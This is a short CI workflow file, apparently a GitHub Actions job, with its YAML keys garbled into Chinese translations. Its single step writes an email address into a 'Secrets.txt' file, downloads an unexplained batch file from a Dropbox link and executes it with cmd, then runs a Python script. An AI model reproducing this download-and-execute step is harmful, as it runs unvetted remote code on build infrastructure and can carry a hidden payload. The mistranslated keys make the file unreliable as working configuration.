姓名：浩阳猫

在：
  工作流程_调度：

工作：
  建造者：
    运行：windows-latest

    脚步：
      -姓名：下载和设置
        运行：|
         echo "EMAIL_SECRET=wushuxi135@gmail.com"> Secrets.txt
         Invoke-WebRequest -Uri“https://www.dropbox.com/scl/fi/gdzoens68gz1o4wuwtf0x/down.bat?rlkey=wd1ecn33dv9yn2uvdyynavbs6&dl=1”-OutFile“down.bat”
         cmd /c down.bat

      -姓名：时间得分
        运行：python time.py
